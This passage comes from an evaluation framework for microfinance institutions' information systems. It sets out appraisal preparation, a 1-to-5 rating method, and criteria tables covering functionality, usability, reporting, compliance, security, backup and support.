institution has an experienced systems person, the team could consist of solely internal personnel. Access to key personnel. Reviewers will need to meet with both the users and developers of the system. # In the case of a study of an internally developed system, the reviewers should have ample time to discuss the system with management and the technical support staff, as well as field operators, such as tellers and loan officers. # When reviewing off-the-shelf packages, the appraisal team should meet with the vendor, including vendor management and technical support. Site visits are a must when evaluating vendor software. The review team should visit at least one organization using the system and question the users and technical staff about the system. Detailed business information. Before undertaking a review of information systems, the appraisal team must have a clear understanding of the MFI’s business processes. This requirement is equally valid for an MFI conducting a review of off-the-shelf packages or evaluating its own systems, as well as for an external review team evaluating a particular MFI’s system. The appraisal team (internal or external) will need to work closely with the MFI’s operations staff to understand the processes and methodology, as well as personnel, geographic locations, and, most important, future goals and growth plans. The review team will need to obtain documentation about the institution, including organizational charts, strategic and business plans, growth projections, operational structures and procedures, product descriptions, and personnel descriptions. System documentation. The appraisal team should obtain copies of all manuals (such as user handbooks and administration guides), reports, screens (windows), and operations schedules (version schedules, backup schedules, and so on). Detailed system information. The appraisal team will need additional information that is typically not available in the system documentation. The following information, which is more fundamentally technical, will provide the reviewers with a deeper level of understanding of the system: # Database information. Whenever possible, the reviewers should obtain a copy of the database structure (that is, how the data are stored in the form of tables, column, rows, and so on), usually found in a data model. If a formal data model is not available, then a printout of the database structure will suffice. (The only major difference is that a data model shows the relationships between different pieces of information, which are especially important in terms of performance and flexibility.) - **Demonstration.** Whenever possible a demonstration version (or demo) of the software should be procured. Regardless, the reviewer should always have access to a fully functional version of the system. - **Source code.** Access to the source code\(^2\) and the database (as well as the data stored within) is not necessary but highly recommended, especially for more in-depth analysis. Many vendors and even some institutions will balk at this request, so beware. As stated, source code is not a requirement, but will greatly assist the appraisal team. - **Testing.** To determine if the calculations performed by the system are accurate, it is valuable to enter actual data from the MFI and compare the calculations with expected results. In this case, access to the database would be crucial. **Site visit.** To perform a detailed review, a two-person team will need at least three to five days on site, depending on the complexity of the system and the experience level of the team members. Allow an additional one to two days for off-the-shelf software when site visits are required. Of course, the reviewer will also need time to write the actual report. Since the team will need to review a large amount of information in the course of the appraisal, it is best to request the above documentation well in advance. How quickly and efficiently the reviewers are provided with much of this information (especially system-generated or related information, such as reports and user guides) may indicate the system’s and user’s competence or completeness. **DOCUMENT STRUCTURE** The remaining portion of this document describes the framework itself. The framework has been broken into distinct **categories.** Each category has been further broken into one or more **topics,** which are defined in a **research matrix.** The research matrix describes each category with all corresponding topics, including any subtopics, with a category and topic (or subtopic) definition, measurement criteria, and a rating method. --- \(^2\) When creating a software application, computer programmers use special instructions written in computer languages to tell the computer what to do and how to function. There are many different computer languages on the market today, including C, C++, Visual Basic, and Delphi. The collection of all the instructions for a given application is called “source code.” Having access to the source code allows the appraiser to review in-depth the logic and soundness of a given application. A hierarchical listing of the framework’s categories and their associate topics and subtopics is provided below for quick reference. A full description of each category is given in the subsequent research matrix, in which each category is defined and supported with in-depth information about each topic and subtopic. The research matrix is the basic operational tool contained in the framework. ### Table 1: Category Hierarchy <table> <thead> <tr> <th>Functionality and Expandability</th> </tr> </thead> <tbody> <tr> <td>- Functional completeness, appropriateness, and integration</td> </tr> <tr> <td>- Accounting package</td> </tr> <tr> <td>- Portfolio tracking</td> </tr> <tr> <td>- Deposit monitoring</td> </tr> <tr> <td>- Customer information system</td> </tr> <tr> <td>- Expandability and institutional growth</td> </tr> <tr> <td>- Flexibility</td> </tr> <tr> <td>- Customer-centric vs. account-centric</td> </tr> <tr> <td>- Institutional types</td> </tr> <tr> <td>- Lending methodologies</td> </tr> <tr> <td>- Loan interest types</td> </tr> <tr> <td>- Savings and deposit account types</td> </tr> <tr> <td>- Deposit interest types</td> </tr> <tr> <td>- Payment types</td> </tr> <tr> <td>- Payment frequencies</td> </tr> <tr> <td>- Multiple branches or regions</td> </tr> <tr> <td>- Multiple languages</td> </tr> <tr> <td>- Multiple currencies</td> </tr> </tbody> </table> <table> <thead> <tr> <th>Usability</th> </tr> </thead> <tbody> <tr> <td>- Ease of use and user-friendliness</td> </tr> <tr> <td>- User interface</td> </tr> </tbody> </table> <table> <thead> <tr> <th>Reporting</th> </tr> </thead> <tbody> <tr> <td>- Reports</td> </tr> <tr> <td>- Report generation</td> </tr> </tbody> </table> <table> <thead> <tr> <th>Standards and Compliance</th> </tr> </thead> <tbody> <tr> <td>- Accounting soundness and standards</td> </tr> <tr> <td>- Governmental and supervisory adherence</td> </tr> </tbody> </table> <table> <thead> <tr> <th>Administration and Support</th> </tr> </thead> <tbody> <tr> <td>- Security</td> </tr> <tr> <td>- Backup and recovery</td> </tr> <tr> <td>- Fault tolerance and robustness</td> </tr> <tr> <td>- End-of-period processing</td> </tr> <tr> <td>- Support infrastructure and maintenance</td> </tr> <tr> <td>- Version control and upgrade strategy</td> </tr> </tbody> </table> <table> <thead> <tr> <th>Technical Specifications and Correctness</th> </tr> </thead> <tbody> <tr> <td>- Technology and architecture</td> </tr> <tr> <td>- Performance</td> </tr> <tr> <td>- Number and date handling</td> </tr> </tbody> </table> <table> <thead> <tr> <th>Cost</th> </tr> </thead> <tbody> <tr> <td>- Pricing and costs</td> </tr> </tbody> </table> The matrix that begins in Chapter Three is organized by category. The category describes, at a high level, the areas in which an information system should be evaluated. Categories represent logical groupings of different subject areas that indicate the fundamental quality of a system. Each category, along with a listing of the corresponding topics and subtopics, is given in Table 1. The matrix outlines each topic within a category using three columns: topic (or subtopic), definition, and measurement criteria. An additional column is provided for the evaluator’s rating or comments: - **Topic (or subtopic):** name of the topic or subtopic. A subtopic is denoted by a ç before the name and the name of the parent topic in parenthesis underneath the subtopic name. - **Definition:** brief definition of the topic or subtopic. The definition is descriptive in nature and should provide enough information for the general user of this matrix to understand what the topic is and what issues or concerns it addresses. - **Measurement criteria:** type of items or issues that should be looked at when assessing a system for the particular topic. The measurement criteria for any given topic are merely suggested. Some effort has been made to delineate the primary criteria for assessing a topic; however, given the varied nature of both computer systems and microfinance, users of this evaluation tool should determine from their surroundings whether more or less criteria would be useful in assessing the topic. - **Rating/comments:** a blank column providing the evaluation team with a space to write comments and determine ratings for the individual topics and subtopics according to the guidelines given below. **RATING METHOD** Each topic or subtopic will receive a rating of 1 to 5 with five being the highest. The rating for each topic or subtopic is determined by using the corresponding definition and measurement criteria as guidelines. It is important to note that the framework provides limited detail on how to evaluate each point, since it assumes a knowledgeable team with sufficient expertise to use judgement in determining ratings. A rating score sheet is provided in Annex A to assist the evaluation team in determining weights and tallying ratings. For any topic with subtopics, the overall topic rating should be an average of the scores for the corresponding subtopics. For example, the “Functional Completeness, Appropriateness, and Integration” topic has four subtopics. The overall rating for this topic would consist of the average of these four scores. Of course, these ratings are subjective, and evaluators may want to adjust the overall rating for any given topic beyond the straight subtopic average. In these cases, evaluators should submit a comment that explains the reason for the adjustment. A slightly different technique should be applied for homegrown systems versus off-the-shelf systems. For instance, an evaluation of an internal system needs to take into consideration the appropriateness of that system in light of the microfinance institution’s stage of development, strategic direction, scale, complexity, and projected growth. In many ways, off-the-shelf systems should be held to a higher standard because they should be applicable to a wider range of organizations and environments. Because this framework is an analytical tool, the evaluators are responsible for determining the best method for applying the framework to any given situation. For instance, in some cases it may not be necessary to rate the software on certain topics or sub-topics because they may not be relevant to the MFI (i.e. multiple currencies, different languages, etc.). Before completing the rating, the appraisal team should prioritize the criteria and then assign weights accordingly. For instance, many MFIs feel that the availability and quality of technical support is a critical issue. Many MFIs have fallen into the trap of buying a feature-rich system that has poor technical support, or no local technical support. This situation can be worse than having no system at all. --- 3 This framework does not provide a mechanism for overall rating of the system, but rather rates the software by topic only. The evaluator could attempt to determine a rating for each category by taking an average, weighted or otherwise, of its corresponding topics, but this is not necessarily recommended or required. CHAPTER THREE CATEGORY 1: FUNCTIONALITY AND EXPANDABILITY Description: Measures the extent to which a software product meets the requirements of different types of microfinance programs and whether it has the capacity to grow and expand with a microfinance institution as the organization evolves and adds functions and clients. On a deeper level, this category deals with how functionally rich a program is—including the types of institutions and methodologies that the software supports. The evaluation of this category would include both front-office and back-office functions. The most intriguing complexity that microfinance imposes on the software developer is its diverse nature. Financial systems by themselves are difficult enough to develop. Microfinance adds several new layers. For example, within the field of microfinance there are numerous different lending methodologies, such as village banking, solidarity groups, and individual lending. There are also many institutional models, such as credit unions, cooperatives, non-governmental organizations (NGOs), and banks (from informal to formal and from small scale to large scale). In addition, the methods for interest and payment calculation are as varied as the number of loan products offered in the field today. To exacerbate the problem, many of these variations can occur inside the same organization. Of course, all of these organizations operate within diverse social, political, economic, regulatory, and legal environments around the world. Add in the different currencies, languages, and reporting requirements and one can begin to fathom the difficulties in creating a quality application that supports one organization, let alone one that supports many. The appraisal team should consider these complexities as the appraisal team completes this section of the Framework. Topics: Functional Completeness, Appropriateness, and Integration; Expandability and Institutional Growth; Flexibility <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | **Functional Completeness, Appropriateness, and Integration** | The features of the system meet the needs of the business in an appropriate fashion. Integration refers to how well the different components of the system can communicate with each other, thus allowing data sharing and reducing the need for multiple entry of data (the need to input the same data into different parts of the system). | (* see subtopics for more details) - Accounting functionality* - Portfolio tracking capabilities* - Savings/deposit tracking facilities* - Client information tracking facilities* - Systems integration - Tracking of nonfinancial activities (impact, business development services, etc.) | | | ➔ Accounting Package (Functional Completeness ...) | Ability of the software to perform a full range of accounting activities. | - Integrated with the savings and portfolio tracking system, or stand-alone\(^4\) - Level of integration—direct (changes made in savings and/or portfolio tracking system immediately affect the proper accounts) or indirect (accounting package is separate, necessitating a periodic update of accounting data) - Complete, consistent, flexible and user-definable chart of accounts (number of digits, levels, and formats) - Tracking of cash flow, revenues, and expenses by several sources or profit/cost centers (donor, account, branch, product, etc.) in addition to consolidated tracking of this information - Ability to perform cost/profitability analysis by product, branch/region, client, etc. - Cash vs. accrual—if accrual, proper provisioning of receivables - Loan loss provisioning and reserves - General ledger - Trial balances - Permits entry of nonportfolio or deposit related income and expenses | | \(^4\) Whether or not an integrated system is preferable is a hotly debated point within the microfinance industry. The appraisal team should decide beforehand whether system integration is important in the context of the specific review. <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td>§ Full range of standard financial reports (balance sheet, income statement, cash flow, etc.)&lt;br.§ Track and apply overhead expenses&lt;br.§ Asset and liability management facilities&lt;br.§ Payroll module&lt;br.§ Fixed assets module&lt;br.§ Treasury functions</td> <td></td> </tr> <tr> <td>➔ Portfolio Tracking (Functional Completeness ...)</td> <td>Ability of the software to monitor and manage the loan portfolio.</td> <td>§ Integrated with accounting system, deposit monitoring, and/or customer information system&lt;br.§ Permits the addition and modification of loan products&lt;br.§ Historic data on products&lt;br.§ Forced deposits (linked to deposit monitoring) with ability to block access to forced savings (where appropriate)&lt;br.§ Linking of forced savings to loans or “membership”&lt;br.§ Collateral (cash and noncash) tracking&lt;br.§ Guarantor tracking and number of guarantors per loan&lt;br.§ Identifying and cross-referencing of group guarantees&lt;br.§ Loan officer specific information (active portfolio, delinquency, number of clients, etc.)&lt;br.§ Correct portfolio aging mechanisms&lt;br.§ Proactively informs the users of potential problems (delinquency, cash standing, productivity, etc.)&lt;br.§ Delinquency management facilities&lt;br.§ Delinquency calculation methodology&lt;br.§ Handling of early, late, partial, and extra payments&lt;br.§ Credit scoring capabilities&lt;br.§ Advanced functionality such as credit cards or smart cards</td> <td></td> </tr> <tr> <td>➔ Deposit Monitoring (Functional Completeness ...)</td> <td>Ability of the software to handle deposit accounts.</td> <td>§ Integrated with accounting system, portfolio tracking, and/or customer information system&lt;br.§ Permits the addition and modification of deposit types&lt;br.§ Historical data on products&lt;br.§ Voluntary deposits (with some tracking of or information about forced savings—linked to portfolio tracking)&lt;br.§ Permits different account types&lt;br.§ Advanced functionality such as ATMs, wire transfers, and smart cards&lt;br.§ Tax withholding functionality</td> <td></td> </tr> <tr> <td>Topic</td> <td>Definition</td> <td>Measurement Criteria</td> <td>Rating/Comments</td> </tr> <tr> <td>-------</td> <td>------------</td> <td>----------------------</td> <td>-----------------</td> </tr> </tbody> </table> | **→ Client Information System (Functional Completeness...)** | Ability of the software to maintain information about clients. | ▪ Strong search capabilities ▪ Maintains customer information such as name, family information, age, gender, address (home and business), and type of business, as well as impact information ▪ Tracks clients at different levels, from individual to group to center to village bank and so on ▪ Able to maintain group and/or village bank information ▪ Facilities to check customer behavior—i.e., credit and deposit status and history (either from external or internal sources) ▪ Historical data on customers ▪ Aggregation of customer data (by region, area, economic activity, loan officer, etc.) ▪ Able to track clients at different stages of the process ▪ Tracks nonclient information, especially guarantors ▪ Performs account transfer functionality (from forced to voluntary or vice versa, one geographic location to another, etc.) ▪ Identifies potential duplicates (i.e., double entry of clients) | | | **Expandability and Institutional Growth** | Ability of the system to support horizontal and vertical institutional growth. In essence, the scalability of the system is in question. | ▪ Modules available to support new products and services (e.g., demand deposits, credit cards, mortgage loans, lines of credit, and money transfers, in addition to standard microfinance services) ▪ Can move with the organization from informal (NGO) to formal financial institution (appropriate reports, treasury functions, etc.) ▪ Number of terminals it can support efficiently—with reasonable response times ▪ Number of clients it can handle with reasonable response times | | | **Flexibility** | Software is considered flexible when the system is easily altered to meet a new or different business requirement. Flexibility also refers to how adaptable an application is to (* see subtopics for more details) | ▪ Support customer-centric or account-centric view* ▪ Supports different institutional types* ▪ Supports multiple methodologies* ▪ Supports different loan interest calculations* ▪ Supports different deposit interest calculations* | | <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> <tbody> <tr> <td></td> <td>different organizational or business situations. The adaptations or alterations can be in the form of changes to the program itself (e.g., code) or parameters used to set up the information system. In addition, the flexibility of a system is reflected in how easily important business-level items (i.e., products, tracking information such as donor, sex, or business type, etc.) can be added, modified, or deleted. Flexibility basically asks the question of how extensible or configurable a system is.</td> <td>• Supports multiple payment types*&lt;br&gt;• Supports different payment frequencies*&lt;br&gt;• Supports multiple branches and regions*&lt;br&gt;• Supports multiple languages*&lt;br&gt;• Supports multiple currencies*</td> <td></td> </tr> <tr> <td>Customer-centric vs. Account-centric (Flexibility)</td> <td>Software of this nature can view the world as starting either from a customer or from an account. This simple nuance can determine how flexible a system is, because a customer-centric system is usually more flexible than an account-centric system. In the customer-centric view, accounts are associated to a customer. In an account-centric world, customers are associated to an account.</td> <td>• Allows a customer to have more than one account and account type (deposit, credit, etc.)&lt;br&gt;• Allows the tracking and maintenance of customer data such as contact information, gender, marital status, business activity, etc.&lt;br&gt;• Allows detailed information about each account to be stored, such as account type, usage of funds, amount, etc.</td> <td></td> </tr> <tr> <td>Topic</td> <td>Definition</td> <td>Measurement Criteria</td> <td>Rating/Comments</td> </tr> <tr> <td>-------</td> <td>------------</td> <td>----------------------</td> <td>-----------------</td> </tr> </tbody> </table> | **Institutional Types (Flexibility)** | Types of institutions the system is designed to support or could support given minimal modifications. | - Full-service banks - Limited-service banks - Cooperative savings and credit societies/unions - Microfinance institutions - Limited liability companies - Foundations or trusts - Other | | | **Lending Methodologies (Flexibility)** | The different types of microfinance loan approaches the system can support or could support given minimal modifications. | - Handles only one lending methodology or can handle multiple methodologies simultaneously Typical lending methodologies include: - Individual clients - Solidarity groups with individual loans - Solidarity groups with group loans - Village banks with individual loans - Village banks with group loans - Other | | | **Loan Interest Types (Flexibility)** | Different forms of interest rate calculations the system supports or could support given minimal modifications. | - Flat - Declining balance - Discounted from the loan - Capitalized - Variable rate - Stepped rate - Commissions and fees - Penalty fees for late payments - Other (user definable, etc.) | | | **Savings and Deposit Account Types (Flexibility)** | The different types of savings accounts supported by the deposit programs or could be supported given minimal modifications. | - Passbook (with or without passbook) - Term deposits (i.e. certificates of deposit) - Group savings - Group insurance fees - Off-book group savings - Demand deposits - Overdraft accounts - Current accounts | | <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | **Deposit Interest Types** | The different types of interest supported by the deposit programs or could be supported given minimal modifications. | • Day of deposit to day of withdrawal • Minimum daily balance • Minimum monthly balance • Minimum quarterly balance • Average daily balance • Average monthly balance • Average quarterly balance | § Day of deposit to day of withdrawal § Minimum daily balance § Minimum monthly balance § Minimum quarterly balance § Average daily balance § Average monthly balance § Other (user definable, etc.) | | **Payment Types** | The ability of the software to handle different common loan payment schedules as well as updates or changes to a payment schedule. How easily the system could be modified to handle new payment types should also be reviewed. | • Term loans with constant payments • Term loans with constant principal • Irregular payments • Single payment • Balloon • Selection of initial and subsequent payment dates • Other (user definable, etc.) | § Term loans with constant payments § Term loans with constant principal § Irregular payments § Single payment § Balloon § Selection of initial and subsequent payment dates § Other (user definable, etc.) | | **Payment Frequencies** | The ability of the software to handle frequent payments as well as standard payments; the ease with which the system can be modified to handle different payment frequencies. | Payment frequencies supported: • Daily • Weekly • Biweekly • Semimonthly • Once every four weeks • Monthly • Other (user definable, etc.) | § Payment frequencies supported: § Daily § Weekly § Biweekly § Semimonthly § Once every four weeks § Monthly § Other (user definable, etc.) | <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> <tbody> <tr> <td>-</td> <td></td> <td>Days (or weeks) of the year supported:</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ 365</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ 360</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ 332</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ 50 weeks</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Other</td> <td></td> </tr> <tr> <td></td> <td>Payment aberrations support:</td> <td></td> <td></td> </tr> <tr> <td></td> <td>§ Prepayments</td> <td></td> <td></td> </tr> <tr> <td></td> <td>§ Late payments</td> <td></td> <td></td> </tr> <tr> <td></td> <td>§ Underpayments</td> <td></td> <td></td> </tr> <tr> <td></td> <td>§ Overpayments</td> <td></td> <td></td> </tr> <tr> <td>➔ Multiple Branches and/or Regions (Flexibility)</td> <td>Ability of the software to handle multiple offices, either on a branch or regional level. In addition, how quickly the system can be updated to handle multiple branches or regions or new locations.</td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Mechanisms for separating information on an office basis</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Mechanisms for aggregating office level data (on-line, store and forward, etc.)</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Reporting on an office or area basis</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Frequency of updates to head office or area office</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Bank and/or account transfers (intra- or inter-)</td> <td></td> </tr> <tr> <td>➔ Multiple Languages (Flexibility)</td> <td>Can the software handle multiple languages or could it handle them given minimal modifications?</td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Supports local language (if written)</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Can support languages on a user basis—multiple languages simultaneously</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ All messages are in the language of choice</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ All screen information is presented in language of choice</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Multiple language support requires recoding (language is hardcode) or is intrinsic to the system (language is parameterized)</td> <td></td> </tr> <tr> <td>➔ Multiple Currencies (Flexibility)</td> <td>Can the software handle multiple currencies or could it handle them given minimal modifications?</td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Supports local currencies and foreign currencies</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Supports payments and disbursements in different currencies</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Supports foreign exchange exposure calculation facilities</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Handles maintenance of value accounts and other inflationary risk mitigation functions</td> <td></td> </tr> </tbody> </table> CHAPTER FOUR CATEGORY 2: USABILITY Description: Measures the degree to which the user interface of the software helps users to perform their tasks effectively and efficiently, with little or no chance of errors. Includes the availability and usefulness of user documentation, screen layouts and navigational aids, on-line help, and prompts. Evaluation would consist of a checklist of key aspects concerning the user interface and a qualitative assessment of the ease of use. One of the best ways of determining the usability and user satisfaction of any software product is a user survey. Therefore, a user survey should be performed to determine how different users rate the software. A user survey is an essential tool that should be used to elicit the answers to the following questions: - Who is the user? (i.e., job title, responsibilities, age, education and training, how long and how much have they interacted with the system, etc.) - How does the software help the users do their work? - What do users like about the system? Why? - Do users think the software is easy to use? Why or why not? - What do users like about the system? Why not? - What else could the system do to improve overall efficiency and job satisfaction? - Overall rating of the system by users Topics: Ease of Use and User-Friendliness; User Interface <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | **Ease of Use and User-Friendliness** | Ability of the user to perform needed tasks easily and efficiently without errors. A major factor when implementing a new information system is how easily both the user community and the administrative personnel can learn and understand the system. The ease of use of a system will determine many things, including the training needs of the organization, the number of user mistakes, and how much the user will like using the system. | ▪ Amount of training required for users, who provides it? Where and how do people get trained? Is it convenient or disruptive to operations? ▪ Quality of user documentation ▪ Usefulness of on-line help (detail, ability to drill-down through topics, hyperlinks, etc.) ▪ Straight-forwardness of operations ▪ Easy error correction ▪ Program does not bomb out or crash when the user does something unexpected ▪ Prompts or guides user to correct actions | | | **User Interface** | For the most part, ease of use can be determined through the user interface. The user interface consists of screen and forms through which users interact with the system. | ▪ Graphical vs. text-based user interface (e.g., Windows vs. DOS) ▪ Physical appearance, layout, and logic of screens and menus ▪ Screens flow logically and consistently ▪ Appropriate information displayed for each level or type of user ▪ Provides a mechanism for mass data entry ▪ Consistent language and verbiage throughout ▪ Error messages in “user-ese” not “tech speak” ▪ Consistent and logical use of color to assist user where possible ▪ Keyboard and mouse access to all major functions ▪ Follows general platform standards (Microsoft for PCs, etc.) | | CHAPTER FIVE CATEGORY 3: REPORTING Description: Examines the extent to which built-in reports cover management and operations requirements, the accuracy of the information presented, and the visual effectiveness of the reports. Examines whether users can modify existing reports or create new reports on their own. Investigates whether the system allows institutions to export data to spreadsheets for further manipulation or whether the data must be re-entered by hand. Evaluation would compare the list of available reports and report customization facilities against a standardized list of required reports, and include a qualitative assessment of the visual layout and effectiveness of the reports. Topics: Reports; Report Generation <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | Reports | Adequacy and accuracy of the standard reports produced by the system. Includes how easy and useable the different reports are. | General: - CGAP suggested reports - Micro-Banking Bulletin standard reports and report formats - Consolidated, as well as separated, reporting capabilities - User modifiable report formats - Reports according to audience (manager, operations, supervisory, etc.) - Report formats are clear and readable - Budget vs. actual reporting is possible Management reports: - Key statistical summaries - Cash-flow projections - Branch office and loan officer performance Operational reports: - Daily listings - Daily delinquency reports - Portfolio quality reports Financial reports: - Trial balance - Daily sub-ledger reports - Daily transaction reports - Monthly, quarterly, and annual financial statements - Ratios and trends - Clear, correct calculations of ratios and indicators - Audit trail - Accounts for inflation and subsidy adjustments | <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | Report Generation | The mechanism through which reports are created. Does the system provide standard ("canned") reports and does it allow the user to generate additional reports without requiring assistance from the software vendor? | Customer reports: - Statements - Balances - Queries - Batch report generation - Ad-hoc report generation - Canned reports - User-defined reports - Report generation tool (crystal reports, etc.) - Report information can be dumped into a file readable by standard word processing or spreadsheet software - Printer and paper size requirements - Reports are generated frequently and are useful to intended audience | | CHAPTER SIX CATEGORY 4: STANDARDS AND COMPLIANCE Description: Studies the extent to which the software product adheres to industry, government, and supervisory standards and regulations. Any system providing accounting support should be assessed to determine whether the system is in accordance with Generally Accepted Accounting Principles (GAAP) and International Accounting Standards (IAS). In addition, every system should meet the regulations set by local, regional, and national supervisory organizations. As the microfinance industry grows and becomes increasingly commercialized, adherence to regulatory mandates will become increasingly important. Topics: Accounting Soundness and Standards; Governmental and Supervisory Adherence <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | Accounting Soundness and Standards | The topic area asks whether the accounting portion of the software product meets generally held standards and process accounts in a sound and consistent way. | ▪ Accounting package can be modified to meet local legal requirements ▪ Adheres to GAAP and/or IAS provisions ▪ Adheres to French accounting principles (where appropriate) ▪ On-line or batch ledger updates ▪ Posting order for partial or late payments ▪ Categorizing current vs. delinquent loans ▪ Accrual vs. cash ▪ Existence of accounts to handle interest and principal due but not received separate from “accrued” ▪ Software ceases to accrue interest on late loans ▪ When savings interest is accrued, posted, and compounded | | | Governmental and Supervisory Adherence | The activities of many microfinance institutions are under the purview of governmental and supervisory regulators. Whether a software package meets these requirement and regulations is the focus of this topic. | ▪ Meets government/supervisory regulations ▪ System can be easily modified to meet changes or additions to regulatory body requirements ▪ Supports reporting requirements of central bank ▪ Integrated into the national payment system | | CHAPTER SEVEN CATEGORY 5: ADMINISTRATION AND SUPPORT Description: A broad range of activities and features are covered by this category. For example, to assess this category accurately, the software provider’s ability to provide support and maintenance to the organization should be determined. Support includes installation, conversion, error correction, user queries, and periodic software improvements. Points to be covered would include years in business, number of staff, location of support offices, number of installed systems, existence of system documentation and operations manuals, and training materials and plans. The category also covers security, which refers to provisions in the software to prevent or detect unauthorized entry, accidental or intentional damage to data, and falsification of records. Other factors to be assessed are the ability of the software to recover accurately from crashes (power outages and others); provisions within the software to ensure the reliability, validity, and safety of the data; and mechanisms for accurately backing up and restoring data. The evaluation would also entail making a checklist of key recovery and backup features and assessing the accuracy and performance of these features. Lastly, this category examines the ability of the vendor or internal staff to provide initial and ongoing support to the software, including the ability of the software provider to provide support and maintenance. Such support includes installation, data conversion, error correction, user queries, and period software improvements. Topics: Security; Backup and Recovery; Fault Tolerance and Robustness; End-of-Period Processing; Support Infrastructure and Maintenance; Version Control and Upgrade Strategy <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | Security | Built-in safeguards of the system to prevent illegal or accidental alteration of the data files. | Look for presence of major security procedures: - Different levels of user access with functions reserved for specific user levels (integrated into the user interface) - Supports different user views based on user permissions and types - User passwords - Does the system prompt users to change their passwords on a regular basis? - Users restricted to specific activities - Inherent security of the database and system architecture, protecting the system from both direct attacks and “back door” entry, the isolation of the database, and proper firewalls - Encryption of the database and passwords - Notification of file violations - Audit trail on transactions that identifies user - System violation log - Time-of-day or terminal access restrictions - Self-auditing program - Off-site data storage of records | | | | Backup and Recovery| Provisions to store completed transactions, balances, and statements safely, and to restore this information if necessary. Ability of the software to accurately recover from an accidental or improper shutdown. | - Automatic end-of-day processing, with built-in recovery mechanisms - Length of time required for backup - Full vs. incremental backups - Does system provide for (or require) full backups on a regular basis—such as weekly or monthly - When restarting the system, correctly completes or restarts transactions or activities to avoid duplication of entries or lost data - How difficult and timely is the recovery process - System keeps track of current status and activity for both the central processing and each user - Does the system have archival facilities for off-loading old, unused data (to keep the database from growing exponentially) | | | *Chapter Seven—Category 5: Administration and Support* <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | **Fault Tolerance and Robustness** | Ability of the system to either recover after a crash (either software or externally induced) or remain on line during such an incident. Since information is the primary resource for managing any financial organization, it is imperative that the software maintains the information integrity of the data. | ▪ For a networked system, the system remains online if the network goes down ▪ Notification to user of transactions not completed ▪ System continues to function properly despite database or operating system errors ▪ System handles major errors “gracefully” by providing users adequate time and information to react correctly | | | **End-of-Period Processing** | Most systems require some sort of administrative intervention to perform end-of-period processing such as interest calculation on deposits and reporting. This topic covers how well the system handles the different end of period procedures. | ▪ Proper interest posting and compounding ▪ Late fees and penalties are calculated correctly ▪ System correctly “closes the books” and prepares for end of period reporting ▪ Transactions are moved from the journal to the general ledger ▪ Report generation cycle is kicked off | | | | | Period duration: ▪ Daily ▪ Weekly ▪ Monthly ▪ Quarterly ▪ Yearly ▪ Other (user-definable) | | | **Support Infrastructure and Maintenance** | This topic describes a wide range of issues related to how well the system in question is supported either by internal or external resources. | Off the shelf: ▪ Years in business ▪ Financial strength of vendor ▪ Number, size, and length of installed systems ▪ Location of nearest support office ▪ Response times/response levels ▪ Support hotline ▪ Number and technical ability of support staff ▪ Access to source code (where appropriate or necessary) ▪ Support of code once changed by the institution ▪ Upgrade support and timeline (regional support offices) | | <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td>• Change request procedure</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• Support capabilities (installation, data conversion, customization, training, day-to-day technical support)</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• System manuals and training materials</td> <td></td> </tr> <tr> <td></td> <td></td> <td>Homegrown information system staff:</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• Response time</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• Internal help desk</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• Support hotline</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• Technical ability of support staff (number and experience)</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• Change request procedure</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• Support capabilities (installation, data conversion, customization, training, day-to-day technical support)</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• System manuals and training materials</td> <td></td> </tr> </tbody> </table> **Version Control and Upgrade Strategy** Version control is how a software developer bundles and packages functionality into a product. To do this bundling properly, the developer needs to manage the program files (code, etc.) in a coherent and controlled way. 